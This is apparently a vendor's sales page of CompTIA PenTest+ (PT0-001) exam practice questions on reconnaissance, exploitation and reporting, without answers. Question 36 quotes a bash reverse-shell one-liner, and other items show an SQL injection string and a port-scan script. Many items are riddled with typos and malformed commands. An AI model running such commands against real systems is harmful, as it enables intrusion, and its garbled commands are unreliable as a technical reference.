Labour Day Sale Limited Time 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 713PS592

Note! The PT0-001 Exam is no longer available. Get in touch with our Live Chat or email us for more information about the PT0-002 Exam.

PT0-001 CompTIA PenTest+ Exam Questions and Answers

Questions 4

When conducting reconnaissance against a target, which of the following should be used to avoid directory communicating with the target?

Options:

A.

Nmap tool

B.

Maltego community edition

C.

Nessus vulnerability scanner

D.

OpenVAS

E.

Melasploit

Buy Now
Questions 5

If a security consultant comes across a password hash that resembles the following

b117 525b3454 7Oc29ca3dBaeOb556ba8

Which of the following formats is the correct hash type?

Options:

A.

Kerberos

B.

NetNTLMvl

C.

NTLM

D.

SHA-1

Buy Now
Questions 6

A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

Options:

A.

nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4

B.

nslookup -ns 8.8.8.8 << dnslist.txt

C.

for x in (1…254); do dig -x 192.168. $x. $x; done

D.

dig -r > echo “8.8.8.8” >> /etc/resolv/conf

Buy Now
Questions 7

A penetration tester is performing an annual security assessment for a repeat client The tester finds indicators of previous compromise Which of the following would be the most logical steps to follow NEXT?

Options:

A.

Report the incident to the tester's immediate manager and follow up with the client immediately

B.

Report the incident to the clients Chief Information Security Officer (CISO) immediately and alter the terms of engagement accordingly

C.

Report the incident to the client's legal department and then follow up with the client's security operations team

D.

Make note of the anomaly, continue with the penetration testing and detail it in the final report

Buy Now
Questions 8

During an internal network penetration test, a tester recovers the NTLM password hash tor a user known to have full administrator privileges on a number of target systems Efforts to crack the hash and recover the plaintext password have been unsuccessful Which of the following would be the BEST target for continued exploitation efforts?

Options:

A.

Operating system Windows 7

Open ports: 23, 161

B.

Operating system Windows Server 2016

Open ports: 53, 5900

C.

Operating system Windows 8 1

Open ports 445, 3389

D.

Operating system Windows 8

Open ports 514, 3389

Buy Now
Questions 9

An SMB server was discovered on the network, and the penetration tester wants to see if the server it vulnerable. Which of the following is a relevant approach to test this?

Options:

A.

Null sessions

B.

Xmas scan

C.

ICMP flood

D.

SYN flood

Buy Now
Questions 10

Which of the following BEST describes the difference between a red team engagement and a penetration test?

Options:

A.

A penetration test has a broad scope and emulates advanced persistent threats while a red team engagement has a limited scope and focuses more on vulnerability identification

B.

A red team engagement has a broad scope and emulates advanced persistent threats, while a penetration test has a limited scope and focuses more on vulnerability identification

C.

A red team engagement has a broad scope and focuses more on vulnerability identification, while a penetration test has a limited scope and emulates advanced persistent threats

D.

A penetration test has a broad scope and focuses more on vulnerability identification while a red team engagement has a limited scope and emulates advanced persistent threats

Buy Now
Questions 11

An internal network penetration test is conducted against a network that is protected by an unknown NAC system In an effort to bypass the NAC restrictions the penetration tester spoofs the MAC address and hostname of an authorized system Which of the following devices if impersonated would be MOST likely to provide the tester with network access?

Options:

A.

Network-attached printer

B.

Power-over-Ethernet injector

C.

User workstation

D.

Wireless router

Buy Now
Questions 12

After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected?

Options:

A.

Run a zero-day exploit.

B.

Create a new domain user with a known password.

C.

Modify a known boot time service to instantiate a call back.

D.

Obtain cleartext credentials of the compromised user.

Buy Now
Questions 13

Which of the following would be BEST for performing passive reconnaissance on a target's external domain?

Options:

A.

Peach

B.

CeWL

C.

OpenVAS

D.

Shodan

Buy Now
Questions 14

A vulnerability scan is run against a domain hosing a banking application that accepts connections over MTTPS and HTTP protocols Given the following results:

• SSU3 supported

• HSTS not enforced

• Application uses weak ciphers

• Vulnerable to clickjacking

Which of the following should be ranked with the HIGHEST risk?

Options:

A.

SSLv3 supported

B.

HSTS not enforced

C.

Application uses week ophers

D.

Vulnerable to clickjacking

Buy Now
Questions 15

Given the following script:

PT0-001 Question 15

Which of the following BEST describes the purpose of this script?

Options:

A.

Log collection

B.

Event collection

C.

Keystroke monitoring

D.

Debug message collection

Buy Now
Questions 16

A penetration tester is preparing to conduct API testing Which of the following would be MOST helpful in preparing for this engagement?

Options:

A.

NiktO

B.

WAR

C.

W3AF

D.

Swagger

Buy Now
Questions 17

Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical

security assessment an example of?

Options:

A.

Lockpicking

B.

Egress sensor triggering

C.

Lock bumping

D.

Lock bypass

Buy Now
Questions 18

Given the following Python script:

#1/usr/bin/python

import socket as skt

for port in range (1,1024):

try:

sox=skt.socket(skt.AF.INET,skt.SOCK_STREAM)

sox.settimeout(1000)

sox.connect ((‘127.0.0.1’, port))

print ‘%d:OPEN’ % (port)

sox.close

except: continue

Which of the following is where the output will go?

Options:

A.

To the screen

B.

To a network server

C.

To a file

D.

To /dev/null

Buy Now
Questions 19

Given the following Python code:

a = 'abcdefghijklmnop'

a[::2]

Which of the following will result?

Options:

A.

adgjmp

B.

pnlhfdb

C.

acegikmo

D.

ab

Buy Now
Questions 20

After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?

Options:

A.

Expand the password length from seven to 14 characters

B.

Implement password history restrictions

C.

Configure password filters

D.

Disable the accounts after five incorrect attempts

E.

Decrease the password expiration window

Buy Now
Questions 21

Which of the following are MOST important when planning for an engagement? (Select TWO).

Options:

A.

Goals/objectives

B.

Architectural diagrams

C.

Tolerance to impact

D.

Storage time for a report

E.

Company policies

Buy Now
Questions 22

A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:

• Code review

• Updates to firewall setting

Options:

A.

Scope creep

B.

Post-mortem review

C.

Risk acceptance

D.

Threat prevention

Buy Now
Questions 23

A penetration tester needs to use Nmap to scan a host with a very low speed so the WAF or IPS/IDS is not triggered. Which of the following command-line parameters should be added to the Nmap command?

Options:

A.

-t 5

B.

-sP 10

C.

-sV

D.

-t 1

Buy Now
Questions 24

Click the exhibit button.

PT0-001 Question 24

Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)

Options:

A.

Arbitrary code execution

B.

Session hijacking

C.

SQL injection

D.

Login credential brute-forcing

E.

Cross-site request forgery

Buy Now
Questions 25

A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In

which of the following areas of the report should the penetration tester put this?

Options:

A.

Appendices

B.

Executive summary

C.

Technical summary

D.

Main body

Buy Now
Questions 26

Which of the following types of physical security attacks does a mantrap mitigate-?

Options:

A.

Lock picking

B.

Impersonation

C.

Shoulder surfing

D.

Tailgating

Buy Now
Questions 27

During a physical security review, a detailed penetration testing report was obtained, which was issued to a

security analyst and then discarded in the trash. The report contains validated critical risk exposures. Which of

the following processes would BEST protect this information from being disclosed in the future?

Options:

A.

Restrict access to physical copies to authorized personnel only.

B.

Ensure corporate policies include guidance on the proper handling of sensitive information.

C.

Require only electronic copies of all documents to be maintained.

D.

Install surveillance cameras near all garbage disposal areas.

Buy Now
Questions 28

A penetration tester is performing a code review against a web application Given the following URL and source code:

PT0-001 Question 28

Which of the following vulnerabilities is present in the code above?

Options:

A.

SQL injection

B.

Cross-site scripting

C.

Command injection

D.

LDAP injection

Buy Now
Questions 29

A penetration tester has been hired to perform a penetration test for an organization. Which of the following is

indicative of an error-based SQL injection attack?

Options:

A.

a=1 or 1––

B.

1=1 or b––

C.

1=1 or 2––

D.

1=1 or a––

Buy Now
Questions 30

A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?

Options:

A.

The client has applied a hot fix without updating the version.

B.

The threat landscape has significantly changed.

C.

The client has updated their codebase with new features.

D.

Thera are currently no known exploits for this vulnerability.

Buy Now
Questions 31

While presenting the results of a penetration test to a client's executive team, the Chief Information Security Officer (CISO) asks for remediation advice for a shared local administrator finding. The client is geographically dispersed, and centralized management is a key concern. Which of the following is the BEST remediation to suggest?

Options:

A.

Have random and unique credentials per system.

B.

Disable the administrator login from the network.

C.

Use a service account for administrative functions.

D.

Implement a single rotating password for systems.

Buy Now
Questions 32

A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

Options:

A.

Download the GHOST file to a Linux system and compilegcc -o GHOSTtest i:./GHOST

B.

Download the GHOST file to a Windows system and compilegcc -o GHOST GHOST.ctest i:./GHOST

C.

Download the GHOST file to a Linux system and compilegcc -o GHOST.ctest i:./GHOST

D.

Download the GHOST file to a Windows system and compilegcc -o GHOSTtest i:./GHOST

Buy Now
Questions 33

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used

in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

Options:

A.

ICS vendors are slow to implement adequate security controls.

B.

ICS staff are not adequately trained to perform basic duties.

C.

There is a scarcity of replacement equipment for critical devices.

D.

There is a lack of compliance for ICS facilities.

Buy Now
Questions 34

A client has scheduled a wireless penetration test. Which of the following describes the scoping target

information MOST likely needed before testing can begin?

Options:

A.

The physical location and network ESSIDs to be tested

B.

The number of wireless devices owned by the client

C.

The client's preferred wireless access point vendor

D.

The bands and frequencies used by the client's devices

Buy Now
Questions 35

While conducting information gathering, a penetration tester is trying to identify Windows hosts. Which of the following characteristics would be BEST to use for fingerprinting?

Options:

A.

The system responds with a MAC address that begins with 00:0A:3B.

B.

The system responds with port 22 open.

C.

The system responds with a TTL of 128.

D.

The system responds with a TCP window size of 5840.

Buy Now
Questions 36

The following line was found in an exploited machine's history file. An attacker ran the following command:

bash -i >& /dev/tcp/192.168.0.1/80 0> &1

Which of the following describes what the command does?

Options:

A.

Performs a port scan.

B.

Grabs the web server's banner.

C.

Redirects a TTY to a remote system.

D.

Removes error logs for the supplied IP.

Buy Now
Questions 37

A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy

Request

POST /Bank/Tax/RTSdocuments/ HTTP 1.1

Host: test.com

Accept: text/html; application/xhtml+xml

Referrer: https://www.test.com/Bank/Tax/RTSdocuments/

Cookie: PHPSESSIONID: ;

Content-Type: application/form-data;

Response

403 Forbidden

Error:

Insufficient Privileges to view the data.

Displaying 1-10 of 105 records

Which of the following types of vulnerabilities is being exploited?

Options:

A.

Forced browsing vulnerability

B.

Parameter pollution vulnerability

C.

File upload vulnerability

D.

Cookie enumeration

Buy Now
Questions 38

A penetration tester is required to report installed shells on compromised systems. Which of the following is the reason?

Options:

A.

To allow another security consultant access to the shell

B.

To allow the developer to troubleshoot the vulnerability

C.

To allow the systems administrator to perform the cleanup

D.

To allow the systems administrator to write a rule on the WAF

Buy Now
Questions 39

A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?

Options:

A.

Karma attack

B.

Deauthentication attack

C.

Fragmentation attack

D.

SSDI broadcast flood

Buy Now
Questions 40

A penetration tester has gained physical access to a facility and connected directly into the internal network.

The penetration tester now wants to pivot into the server VLAN. Which of the following would accomplish this?

Options:

A.

Spoofing a printer’s MAC address

B.

Abusing DTP negotiation

C.

Performing LLMNR poisoning

D.

Conducting an STP attack

Buy Now
Questions 41

Defining exactly what is to be tested and the results to be generated from the test will help prevent?

Options:

A.

testing scope creep

B.

scheduling conflicts

C.

impact on production

D.

disclosure of information.

Buy Now
Questions 42

A healthcare organization must abide by local regulations to protect and attest to the protection of personal

health information of covered individuals. Which of the following conditions should a penetration tester

specifically test for when performing an assessment? (Select TWO).

Options:

A.

Cleartext exposure of SNMP trap data

B.

Software bugs resident in the IT ticketing system

C.

S/MIME certificate templates defined by the CA

D.

Health information communicated over HTTP

E.

DAR encryption on records servers

Buy Now
Questions 43

A client asks a penetration tester to add more addresses to a test currently in progress. Which of the following would defined the target list?

Options:

A.

Rules of engagement

B.

Master services agreement

C.

Statement of work

D.

End-user license agreement

Buy Now
Questions 44

A penetration tester is reviewing a Zigbee Implementation for security issues. Which of the following device types is the tester MOST likely testing?

Options:

A.

Router

B.

loT

C.

WAF

D.

PoS

Buy Now
Exam Code: PT0-001
Exam Name: CompTIA PenTest+ Exam
Last Update: Dec 11, 2023
Questions: 294